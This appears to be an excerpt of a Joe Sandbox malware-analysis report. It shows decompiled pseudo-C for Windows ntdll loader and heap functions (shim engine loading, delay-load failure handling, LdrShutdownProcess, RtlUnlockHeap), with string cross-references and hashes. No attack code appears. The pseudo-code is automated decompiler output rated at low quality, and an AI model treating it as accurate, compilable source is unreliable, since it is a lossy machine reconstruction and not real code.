                                                                            							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
                                                                            						}
                                                                            					}
                                                                            					goto L6;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D7C651C
                                                                              • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C6614
                                                                              • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C665F
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8297A0, 1D8297C9
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D8297B9
                                                                            • LdrpInitShimEngine, xrefs: 1D829783, 1D829796, 1D8297BF
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D82977C
                                                                            • apphelp.dll, xrefs: 1D7C6446
                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D829790
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-204845295
                                                                            • Opcode ID: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                            • Instruction ID: 2ca8c70b25f997e2c5bc56d39329461143c7a7c8dd24b5d896700408dd90b78a
                                                                            • Opcode Fuzzy Hash: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                            • Instruction Fuzzy Hash: 1151EDB0248301DFD310DF24D8D4BAA77E8FF847A4F50492AF6959B1A0DA30EA40CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 17%
                                                                            			E1D84FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                            				char* _v8;
                                                                            				intOrPtr _v12;
                                                                            				char* _v16;
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				char* _v36;
                                                                            				intOrPtr _v40;
                                                                            				intOrPtr _v44;
                                                                            				intOrPtr _v48;
                                                                            				intOrPtr _v52;
                                                                            				char _v56;
                                                                            				signed char _t50;
                                                                            				intOrPtr _t51;
                                                                            				intOrPtr _t66;
                                                                            				intOrPtr _t68;
                                                                            				char* _t71;
                                                                            				void* _t74;
                                                                            				intOrPtr* _t75;
                                                                            				intOrPtr* _t76;
                                                                            				char* _t77;
                                                                            
                                                                            				_t74 = __edx;
                                                                            				_v20 = __ecx;
                                                                            				_t66 = 0;
                                                                            				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
                                                                            				E1D84F899(__ecx, _a4, _a16,  &_v16,  &_v8);
                                                                            				_t50 =  *0x1d8c37c0; // 0x0
                                                                            				_t77 = _v16;
                                                                            				if((_t50 & 0x00000003) != 0) {
                                                                            					_t71 = _t77;
                                                                            					if(_t77 == 0) {
                                                                            						_t71 = "Unknown";
                                                                            					}
                                                                            					_push(_a20);
                                                                            					_push(_v20 + 0x2c);
                                                                            					_push(_v8);
                                                                            					_push(_t71);
                                                                            					E1D84E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
                                                                            					_t50 =  *0x1d8c37c0; // 0x0
                                                                            				}
                                                                            				if((_t50 & 0x00000010) != 0) {
                                                                            					asm("int3");
                                                                            				}
                                                                            				if(_t74 == 0) {
                                                                            					_t68 = _t66;
                                                                            					goto L11;
                                                                            				} else {
                                                                            					_t68 =  *((intOrPtr*)(_t74 + 0x18));
                                                                            					if(( *0x1d8c391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
                                                                            						L11:
                                                                            						_t51 = 1;
                                                                            						goto L12;
                                                                            					} else {
                                                                            						_t51 = _t66;
                                                                            						L12:
                                                                            						_t75 = _a8;
                                                                            						if(_t75 == 0 || _t51 == 0) {
                                                                            							L18:
                                                                            							_t76 = _a12;
                                                                            							if(_t76 != 0) {
                                                                            								if(_t77 == 0) {
                                                                            									_t77 = _v8;
                                                                            								}
                                                                            								 *0x1d8c91e0(_v12, _t77);
                                                                            								_t66 =  *_t76();
                                                                            							}
                                                                            							goto L22;
                                                                            						} else {
                                                                            							_v52 = _a4;
                                                                            							_v48 = _a16;
                                                                            							_v28 = _t66;
                                                                            							_v56 = 0x24;
                                                                            							_v44 = _v12;
                                                                            							_v32 = _t68;
                                                                            							_v24 = E1D806010(_a20);
                                                                            							if(_t77 == 0) {
                                                                            								_v40 = _t66;
                                                                            								_v36 = _v8;
                                                                            							} else {
                                                                            								_v40 = 1;
                                                                            								_v36 = _t77;
                                                                            							}
                                                                            							 *0x1d8c91e0(4,  &_v56);
                                                                            							_t66 =  *_t75();
                                                                            							if(_t66 != 0) {
                                                                            								L22:
                                                                            								return _t66;
                                                                            							} else {
                                                                            								goto L18;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                            • API String ID: 3446177414-4227709934
                                                                            • Opcode ID: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                            • Instruction ID: 8e81f3d5fe0ab918a723feabb34e71aa3ffcf89d7628c5b91d5a12467751c57d
                                                                            • Opcode Fuzzy Hash: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                            • Instruction Fuzzy Hash: 62415276A0121DAFCB01DF99C988BEEBBB5FF88358F218159F904A7340D7719A01CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E1D7C6565(intOrPtr* __ecx) {
                                                                            				signed int _v8;
                                                                            				char _v16;
                                                                            				char _v92;
                                                                            				char _v93;
                                                                            				char _v100;
                                                                            				signed short _v106;
                                                                            				char _v108;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				intOrPtr* _t56;
                                                                            				signed char _t67;
                                                                            				intOrPtr _t76;
                                                                            				signed char _t81;
                                                                            				signed int _t86;
                                                                            				signed int _t87;
                                                                            				char _t88;
                                                                            				intOrPtr _t103;
                                                                            				signed int _t106;
                                                                            				intOrPtr* _t110;
                                                                            				signed int _t111;
                                                                            				signed int _t112;
                                                                            				intOrPtr _t113;
                                                                            				signed int _t114;
                                                                            				intOrPtr* _t116;
                                                                            				signed int _t117;
                                                                            				void* _t118;
                                                                            
                                                                            				_v8 =  *0x1d8cb370 ^ _t117;
                                                                            				_v93 = 1;
                                                                            				_t110 = __ecx;
                                                                            				E1D7EE8A6(0, 0x4001,  &_v92);
                                                                            				_t106 =  *0x7ffe0330;
                                                                            				_t86 =  *0x1d8c9200; // 0x0
                                                                            				_t113 = 0x20;
                                                                            				 *0x1d8c65f8 = 1;
                                                                            				_t92 = _t113 - (_t106 & 0x0000001f);
                                                                            				asm("ror ebx, cl");
                                                                            				_t87 = _t86 ^ _t106;
                                                                            				if( *__ecx == 0) {
                                                                            					L8:
                                                                            					_t88 = _v93;
                                                                            					L9:
                                                                            					if(_v16 != 0) {
                                                                            						E1D7FE7E0(_t92, _v92);
                                                                            					}
                                                                            					_t114 =  *0x1d8c9210; // 0x0
                                                                            					asm("ror esi, cl");
                                                                            					 *0x1d8c91e0();
                                                                            					 *(_t114 ^  *0x7ffe0330)();
                                                                            					_t108 =  *0x7ffe0330;
                                                                            					_t111 =  *0x1d8c9218; // 0x0
                                                                            					_push(0x20);
                                                                            					asm("ror edi, cl");
                                                                            					_t112 = _t111 ^  *0x7ffe0330;
                                                                            					E1D7DFED0(0x1d8c32d8);
                                                                            					_t98 = 0x1d8c5d8c;
                                                                            					if( *0x1d8c65f0 != 0) {
                                                                            						_t56 =  *0x1d8c5d8c; // 0x1932c18
                                                                            						while(1) {
                                                                            							__eflags = _t56 - _t98;
                                                                            							if(_t56 == _t98) {
                                                                            								break;
                                                                            							}
                                                                            							_v100 = _t56;
                                                                            							_t39 = _t56 + 0x35;
                                                                            							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
                                                                            							__eflags =  *_t39;
                                                                            							_t56 =  *_t56;
                                                                            						}
                                                                            						goto L11;
                                                                            					} else {
                                                                            						L11:
                                                                            						_t116 =  *0x1d8c5d8c; // 0x1932c18
                                                                            						if( *0x1d8c65f4 < 2) {
                                                                            							_t116 =  *_t116;
                                                                            						}
                                                                            						if(_t116 == _t98) {
                                                                            							L15:
                                                                            							 *0x1d8c65f0 = 1;
                                                                            							 *0x1d8c65f8 = 0;
                                                                            							E1D7DE740(_t98);
                                                                            							E1D7C676F(_t98);
                                                                            							return E1D814B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8c32d8);
                                                                            						} else {
                                                                            							do {
                                                                            								_v100 = _t116;
                                                                            								_t108 = _t112;
                                                                            								_t24 = _t116 + 0x50; // 0x1932be0
                                                                            								_t98 =  *_t24;
                                                                            								E1D7C6704( *_t24, _t112);
                                                                            								_t116 =  *_t116;
                                                                            							} while (_t116 != 0x1d8c5d8c);
                                                                            							goto L15;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					goto L1;
                                                                            				}
                                                                            				do {
                                                                            					L1:
                                                                            					E1D815050(_t92,  &_v108, _t110);
                                                                            					_t92 = E1D7C6B45( &_v108,  &_v92, 1,  &_v100);
                                                                            					if(_t92 < 0) {
                                                                            						_t67 =  *0x1d8c37c0; // 0x0
                                                                            						__eflags = _t67 & 0x00000003;
                                                                            						if((_t67 & 0x00000003) != 0) {
                                                                            							_push(_t92);
                                                                            							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                            							_t67 =  *0x1d8c37c0; // 0x0
                                                                            							_t118 = _t118 + 0x1c;
                                                                            						}
                                                                            						__eflags = _t67 & 0x00000010;
                                                                            						if((_t67 & 0x00000010) != 0) {
                                                                            							asm("int3");
                                                                            						}
                                                                            						_v93 = 0;
                                                                            						goto L6;
                                                                            					}
                                                                            					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
                                                                            					E1D807DF6(_v100);
                                                                            					_t76 = _v100;
                                                                            					_t103 =  *((intOrPtr*)(_t76 + 0x50));
                                                                            					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
                                                                            					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
                                                                            						L5:
                                                                            						 *0x1d8c91e0( *((intOrPtr*)(_t76 + 0x18)));
                                                                            						 *_t87();
                                                                            						_t92 = _v100;
                                                                            						E1D7ED3E1(_t87, _v100, _t113);
                                                                            						goto L6;
                                                                            					}
                                                                            					_t113 = E1D7F16EE(_t87, _t103, _t110, _t113, _t122);
                                                                            					if(_t113 < 0) {
                                                                            						_t81 =  *0x1d8c37c0; // 0x0
                                                                            						_t88 = 0;
                                                                            						__eflags = _t81 & 0x00000003;
                                                                            						if((_t81 & 0x00000003) != 0) {
                                                                            							_push(_t113);
                                                                            							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
                                                                            							_t81 =  *0x1d8c37c0; // 0x0
                                                                            						}
                                                                            						__eflags = _t81 & 0x00000010;
                                                                            						if((_t81 & 0x00000010) != 0) {
                                                                            							asm("int3");
                                                                            						}
                                                                            						_t92 = _t113;
                                                                            						E1D851D5E(_t113);
                                                                            						_push(_t113);
                                                                            						_push(0xffffffff);
                                                                            						E1D812C70();
                                                                            						_t113 = 0x20;
                                                                            						goto L9;
                                                                            					}
                                                                            					_t76 = _v100;
                                                                            					goto L5;
                                                                            					L6:
                                                                            					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
                                                                            				} while ( *_t110 != 0);
                                                                            				_t113 = 0x20;
                                                                            				goto L8;
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D829854, 1D829895
                                                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829885
                                                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829843
                                                                            • LdrpLoadShimEngine, xrefs: 1D82984A, 1D82988B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-3589223738
                                                                            • Opcode ID: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                            • Instruction ID: 92fb5f25714077d14a7ef4b7acd7c39366007c329a021ba9c97ce5a205ac80f2
                                                                            • Opcode Fuzzy Hash: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                            • Instruction Fuzzy Hash: 8A514435A00355DFCB04DBA8CCD8BEC77B6AB44364F050165E551AF2A5CB70BC40C782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E1D7FD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                            				void* _t68;
                                                                            				intOrPtr _t70;
                                                                            				signed int _t78;
                                                                            				signed char _t79;
                                                                            				intOrPtr _t85;
                                                                            				intOrPtr _t88;
                                                                            				intOrPtr _t97;
                                                                            				char _t99;
                                                                            				signed int _t102;
                                                                            				signed int _t103;
                                                                            				signed char _t106;
                                                                            				signed int _t108;
                                                                            				signed int _t112;
                                                                            				intOrPtr _t119;
                                                                            				intOrPtr _t121;
                                                                            				intOrPtr _t122;
                                                                            				intOrPtr _t127;
                                                                            				intOrPtr _t129;
                                                                            				intOrPtr _t134;
                                                                            				signed int _t137;
                                                                            				signed int _t138;
                                                                            				void* _t141;
                                                                            				void* _t143;
                                                                            
                                                                            				_push(0x68);
                                                                            				_push(0x1d8ac5e8);
                                                                            				_t68 = E1D827BE4(__ebx, __edi, __esi);
                                                                            				_t127 =  *[fs:0x18];
                                                                            				_t97 =  *((intOrPtr*)(_t127 + 0x30));
                                                                            				if( *0x1d8c5da8 != 0) {
                                                                            					L19:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
                                                                            					return _t68;
                                                                            				}
                                                                            				_t102 =  *(_t97 + 0x10);
                                                                            				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
                                                                            				_t70 =  *((intOrPtr*)(_t102 + 0x44));
                                                                            				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
                                                                            				_t103 =  *(_t97 + 0x10);
                                                                            				if(( *(_t103 + 8) & 0x00000001) == 0) {
                                                                            					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
                                                                            				}
                                                                            				if(( *0x1d8c37c0 & 0x00000005) != 0) {
                                                                            					_push(_t141 - 0x30);
                                                                            					E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
                                                                            					_t143 = _t143 + 0x1c;
                                                                            				}
                                                                            				_t74 =  *((intOrPtr*)(_t127 + 0x24));
                                                                            				 *0x1d8c5dac =  *((intOrPtr*)(_t127 + 0x24));
                                                                            				 *0x1d8c5da8 = 1;
                                                                            				if( *0x1d8c65f0 != 0) {
                                                                            					_t137 =  *0x1d8c91f8; // 0x0
                                                                            					asm("ror esi, cl");
                                                                            					_t138 = _t137 ^  *0x7ffe0330;
                                                                            					_t103 = _t138;
                                                                            					 *0x1d8c91e0(0x20);
                                                                            					_t74 =  *_t138();
                                                                            				}
                                                                            				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
                                                                            				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
                                                                            					_push(1);
                                                                            					E1D7D4779(_t74, _t118);
                                                                            				}
                                                                            				if(( *0x1d8c391c & 0x00000002) == 0) {
                                                                            					_t78 =  *(_t97 + 0x10);
                                                                            					__eflags =  *(_t78 + 8) & 0x40000000;
                                                                            					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
                                                                            					__eflags =  *0x1d8c9234 & 0x00000001;
                                                                            					_t79 = _t78 & 0xffffff00 | ( *0x1d8c9234 & 0x00000001) == 0x00000000;
                                                                            					__eflags = _t79 & _t106;
                                                                            					if((_t79 & _t106) == 0) {
                                                                            						goto L7;
                                                                            					}
                                                                            					 *((char*)(_t141 - 0x19)) = 1;
                                                                            					_t99 = 0;
                                                                            					L15:
                                                                            					_t85 =  *[fs:0x30];
                                                                            					__eflags =  *0x1d8c68c8;
                                                                            					if( *0x1d8c68c8 != 0) {
                                                                            						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
                                                                            						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
                                                                            							E1D850FC8();
                                                                            							 *0x1d8c68c8 = _t99;
                                                                            						}
                                                                            					}
                                                                            					__eflags =  *((char*)(_t141 - 0x19));
                                                                            					if( *((char*)(_t141 - 0x19)) == 0) {
                                                                            						E1D7FD8F0();
                                                                            					}
                                                                            					_t68 = E1D7FD898();
                                                                            					goto L19;
                                                                            				}
                                                                            				L7:
                                                                            				_t99 = 0;
                                                                            				 *((char*)(_t141 - 0x19)) = 0;
                                                                            				_t129 =  *0x1d8c5da0; // 0x19584f8
                                                                            				L8:
                                                                            				if(_t129 != 0x1d8c5d9c) {
                                                                            					_t18 = _t129 - 0x10; // 0x19584e8
                                                                            					_t122 = _t18;
                                                                            					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
                                                                            					_t20 = _t129 + 4; // 0x1956fa8
                                                                            					_t129 =  *_t20;
                                                                            					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
                                                                            					_t22 = _t122 + 0x1c; // 0x6cf59bf0
                                                                            					_t88 =  *_t22;
                                                                            					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
                                                                            					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
                                                                            						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
                                                                            						 *((intOrPtr*)(_t141 - 0x50)) = 1;
                                                                            						_t112 = 7;
                                                                            						memset(_t141 - 0x4c, 0, _t112 << 2);
                                                                            						_t143 = _t143 + 0xc;
                                                                            						_t31 = _t122 + 0x48; // 0x0
                                                                            						E1D7EDC40(_t141 - 0x54,  *_t31);
                                                                            						 *((intOrPtr*)(_t141 - 4)) = _t99;
                                                                            						_t134 =  *((intOrPtr*)(_t141 - 0x24));
                                                                            						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
                                                                            						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
                                                                            							E1D7EF0A3(_t99, 0, _t134, _t134, 1, __eflags);
                                                                            						}
                                                                            						_push(1);
                                                                            						_push(_t99);
                                                                            						E1D7EDCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
                                                                            						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
                                                                            						_t129 =  *((intOrPtr*)(_t141 - 0x20));
                                                                            						E1D7FD886();
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            				_t119 =  *0x1d8c5b24; // 0x1932c18
                                                                            				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
                                                                            				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
                                                                            					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
                                                                            					 *((intOrPtr*)(_t141 - 0x74)) = 1;
                                                                            					_t108 = 7;
                                                                            					memset(_t141 - 0x70, 0, _t108 << 2);
                                                                            					_t47 = _t119 + 0x48; // 0x0
                                                                            					E1D7EDC40(_t141 - 0x78,  *_t47);
                                                                            					 *((intOrPtr*)(_t141 - 4)) = 1;
                                                                            					_t121 =  *0x1d8c5b24; // 0x1932c18
                                                                            					E1D7EF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
                                                                            					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
                                                                            					E1D7FD88F();
                                                                            				}
                                                                            				goto L15;
                                                                            			}



























                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D7FD879
                                                                              • Part of subcall function 1D7D4779: RtlDebugPrintTimes.NTDLL ref: 1D7D4817
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1975516107
                                                                            • Opcode ID: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                            • Instruction ID: 8a72cbcae321140423825cb1168d1567c14dc21e905b0144bc3e1d841816d368
                                                                            • Opcode Fuzzy Hash: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                            • Instruction Fuzzy Hash: 6A512475A08355DFCB24CFA8C4887DDBBF1BF08324F15815AD5646B391D770A942CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 19%
                                                                            			E1D7FDA20(void* __ecx, intOrPtr _a4) {
                                                                            				intOrPtr _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr* _t44;
                                                                            				char* _t45;
                                                                            				void* _t65;
                                                                            				intOrPtr _t72;
                                                                            				signed int _t73;
                                                                            				intOrPtr _t74;
                                                                            				void* _t82;
                                                                            				signed char* _t87;
                                                                            				signed char _t90;
                                                                            				intOrPtr _t92;
                                                                            				intOrPtr _t93;
                                                                            				intOrPtr* _t94;
                                                                            				signed int* _t95;
                                                                            
                                                                            				_t93 = _a4;
                                                                            				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
                                                                            					E1D899335(_t93, 0, __ecx);
                                                                            					L6:
                                                                            					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                            					if(_t44 != 0) {
                                                                            						if( *_t44 == 0) {
                                                                            							goto L7;
                                                                            						}
                                                                            						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            						L8:
                                                                            						if( *_t45 != 0) {
                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                            								E1D88F717(_t93);
                                                                            							}
                                                                            						}
                                                                            						return 1;
                                                                            					}
                                                                            					L7:
                                                                            					_t45 = 0x7ffe0380;
                                                                            					goto L8;
                                                                            				}
                                                                            				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
                                                                            					_t94 =  *0x1d8c376c; // 0x0
                                                                            					 *0x1d8c91e0(_t93);
                                                                            					return  *_t94();
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E1D7CB910();
                                                                            					} else {
                                                                            						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E1D7CB910("Invalid heap signature for heap at %p", _t93);
                                                                            					E1D7CB910(", passed to %s", "RtlUnlockHeap");
                                                                            					_push("\n");
                                                                            					E1D7CB910();
                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                            						 *0x1d8c47a1 = 1;
                                                                            						asm("int3");
                                                                            						 *0x1d8c47a1 = 0;
                                                                            					}
                                                                            					return 0;
                                                                            				}
                                                                            				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
                                                                            					goto L6;
                                                                            				}
                                                                            				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
                                                                            				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
                                                                            				_t13 = _t92 + 8;
                                                                            				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
                                                                            				if( *_t13 != 0) {
                                                                            					goto L6;
                                                                            				}
                                                                            				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
                                                                            				_t87 = _t92 + 4;
                                                                            				_t65 = 0xfffffffe;
                                                                            				asm("lock cmpxchg [edx], ecx");
                                                                            				_v12 = 0xffff;
                                                                            				if(_t65 != 0xfffffffe) {
                                                                            					if(( *_t87 & 0x00000001) != 0) {
                                                                            						E1D86AA40(_t92);
                                                                            					}
                                                                            					_t72 =  *((intOrPtr*)(_t92 + 0x10));
                                                                            					_v8 = _t72;
                                                                            					if(_t72 == 0) {
                                                                            						_v8 = E1D7FFEC0(_t92);
                                                                            					}
                                                                            					_v16 = _v16 & 0x00000000;
                                                                            					_t95 = _t92 + 4;
                                                                            					_t73 = _v12;
                                                                            					while(1) {
                                                                            						_t90 = _t73 & 0x00000002 | 0x00000001;
                                                                            						_t82 = _t90 + _t73;
                                                                            						asm("lock cmpxchg [esi], ecx");
                                                                            						if(_t73 == _t73) {
                                                                            							break;
                                                                            						}
                                                                            						E1D7FBAC0(_t82,  &_v16);
                                                                            						_t73 =  *_t95;
                                                                            					}
                                                                            					_t93 = _a4;
                                                                            					_t74 = _v8;
                                                                            					if((_t90 & 0x00000002) != 0) {
                                                                            						E1D7FF300(_t92, _t74);
                                                                            					}
                                                                            				}
                                                                            				goto L6;
                                                                            			}




















                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                            • API String ID: 3446177414-3224558752
                                                                            • Opcode ID: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
                                                                            • Instruction ID: 153b6b1d5fd3aae4f327d5769b48aca5f0376d8ffde268835db1b8410ab7667d
                                                                            • Opcode Fuzzy Hash: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
                                                                            • Instruction Fuzzy Hash: D9411632A08645EFC712DF28C884BAAB3A4FF44735F048569E56A87391C738E980D7D7
                                                                            Uniqueness
